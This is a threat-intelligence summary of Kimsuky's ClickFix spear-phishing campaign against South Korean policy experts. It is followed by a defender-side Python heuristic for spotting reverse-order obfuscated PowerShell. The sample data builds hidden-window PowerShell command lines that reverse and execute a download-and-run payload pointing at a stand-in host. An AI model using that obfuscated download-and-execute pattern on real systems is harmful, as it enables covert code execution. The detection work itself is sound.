Analysis of the threat case of kimsuky group using 'ClickFix' tactic

2025-07-01 Genians

https://www.genians.co.kr/en/blog/threat_intelligence/suky-castle


Genians links early 2025 ClickFix activity to Kimsuky and assesses it as an extension of the group's BabyShark campaign. The activity targeted South Korean experts in diplomacy, national security, and international politics through sustained spear-phishing, including impersonation of journalists and an aide to a senior U.S. national security official. One infection chain delivered an encrypted archive containing a malicious VBS file that opened a decoy document, downloaded from konamo.xyz, established persistence with a scheduled task, collected process and user details, and contacted a BabyShark-pattern C2 endpoint. A later variant replaced the VBS delivery with a ClickFix-style secure-document lure that instructed users to copy and paste an authentication code into PowerShell, using reverse-order obfuscation to hide the executed command. The report shows Kimsuky adapting public ClickFix tradecraft into targeted social-engineering operations against South Korean policy-focused targets.
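As an added defender-side example (not code from the Genians report), the Python heuristic below reads every quoted literal in a PowerShell command line backwards and flags any that then contains download-and-execute tokens, which is the tell of the reverse-order obfuscation the ClickFix lure relies on. The token list, the reversal-primitive patterns, the sample command lines and the example.invalid URL are constructed assumptions, not indicators from the report.

```python
import re
from dataclasses import dataclass, field

# Tokens that only make sense in forward PowerShell; seeing them in a literal read backwards is the signal
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "http://", "https://",
                     "downloadstring", "iwr", "invoke-webrequest", "new-object")
# Primitives a script needs to flip the literal back before executing it (assumed patterns)
REVERSAL_PRIMITIVES = re.compile(
    r"\[array\]::reverse|\[-1\s*\.\.\s*-|-join\s*['\"]{2}", re.IGNORECASE)
SINGLE_QUOTED = re.compile(r"'([^']*)'")
DOUBLE_QUOTED = re.compile(r'"([^"]*)"')

@dataclass
class Finding:
    command_line: str
    reversed_literal: str                # the literal after flipping it back
    matched_tokens: list = field(default_factory=list)
    has_reversal_primitive: bool = False

def reversed_literals(cmd):
    """Yield every quoted literal in a command line, read backwards."""
    for pattern in (SINGLE_QUOTED, DOUBLE_QUOTED):
        for m in pattern.finditer(cmd):
            yield m.group(1)[::-1]

def inspect_command_line(cmd):
    """Return a Finding when a literal, once reversed, reads like a PowerShell
    download-and-execute; None for everything else (heuristic, tune the tokens)."""
    primitive = bool(REVERSAL_PRIMITIVES.search(cmd))
    for flipped in reversed_literals(cmd):
        hits = [t for t in SUSPICIOUS_TOKENS if t in flipped.lower()]
        if hits:
            return Finding(cmd, flipped, hits, primitive)
    return None

def scan(command_lines):
    # Run the check over a batch of process command lines (e.g. from 4688 events)
    return [f for f in map(inspect_command_line, command_lines) if f]

# Constructed stand-in for the pasted "authentication code"; the report does not publish the real one
FORWARD_PAYLOAD = "iex (iwr http://example.invalid/auth).Content"
SAMPLE_COMMAND_LINES = [
    # reversed literal flipped back with a negative index slice, then executed
    "powershell.exe -nop -w hidden -c $s='" + FORWARD_PAYLOAD[::-1]
    + "';iex ($s[-1..-($s.Length)] -join '')",
    # same trick using [array]::Reverse on a char array
    "powershell.exe -c $c=[char[]]'" + FORWARD_PAYLOAD[::-1]
    + "';[array]::Reverse($c);iex (-join $c)",
    # benign administrative command: must not fire
    "powershell.exe -c Get-ChildItem 'C:\\Program Files' | Measure-Object",
]
```

Feeding real 4688 or 4104 command lines into `scan` yields a Finding per hit with the de-obfuscated literal attached, which is what an analyst wants in the alert rather than the backwards blob.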

Indicators of Compromise

